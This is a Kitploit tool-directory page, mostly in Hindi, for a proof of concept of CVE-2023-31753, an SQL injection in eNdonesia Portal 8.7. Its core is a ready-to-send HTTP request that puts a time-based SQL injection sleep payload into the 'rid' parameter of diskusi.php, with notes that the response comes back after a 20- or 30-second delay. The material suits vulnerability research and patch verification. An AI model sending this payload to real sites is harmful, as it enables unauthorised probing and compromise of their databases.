Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-31753 — Proof of Concept for CVE-2023-31753 - eNdonesia Portal 8.7 | Kitploit
उपकरण/GitHubGitHub/kil0byt3x/cve-2023-31753
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubkil0byt3x/cve-2023-31753

CVE-2023-31753

Proof of Concept for CVE-2023-31753 - eNdonesia Portal 8.7

रिपॉजिटरी देखें
23 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-31753 के लिए प्रूफ ऑफ कॉन्सेप्ट

विवरण: eNdonesia Portal v8.7 में एक SQL इंजेक्शन कमजोरी पाई गई, जिसका शोषण diskusi.php में "rid" पैरामीटर में तैयार पेलोड डालने पर किया जाता है।

  • शोषण शीर्षक: eNdonesia Portal 8.7 - SQL injection vulnerability in diskusi.php (rid parameter)
  • दिनांक: May 19, 2023
  • शोषण लेखक: Kunal Khubchandani
  • विक्रेता होमपेज: http://www.endonesia.org/
  • सॉफ्टवेयर लिंक: https://sourceforge.net/projects/endonesia/
  • संस्करण: 8.7
  • श्रेणी: Webapps
  • परीक्षण किया गया: WiN11_x64/KaLiLinuX_x64
  • CVE : CVE-2023-31753

#POC:

  1. इस कमजोरी का शोषण करने के लिए, निम्नलिखित HTTP अनुरोध में "rid" GET पैरामीटर के मान के रूप में SQLi स्लीप पेलोड भेजना होगा।

  2. कमजोर अनुरोध:

GET /endonesia.8.7.en/mod.php?mod=diskusi&op=delres&rid=(select*from(select(sleep(20)))a) HTTP/1.1
Host: TARGET
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Connection: close
Cache-Control: max-age=0

  1. उपरोक्त HTTP अनुरोध Burp Suite के माध्यम से भेजने पर, उपयोगकर्ता को 20 सेकंड की देरी के साथ प्रतिक्रिया प्राप्त होगी।

** 20 सेकंड की देरी:

image

** 30 सेकंड की देरी:

image

टूल डाउनलोड करें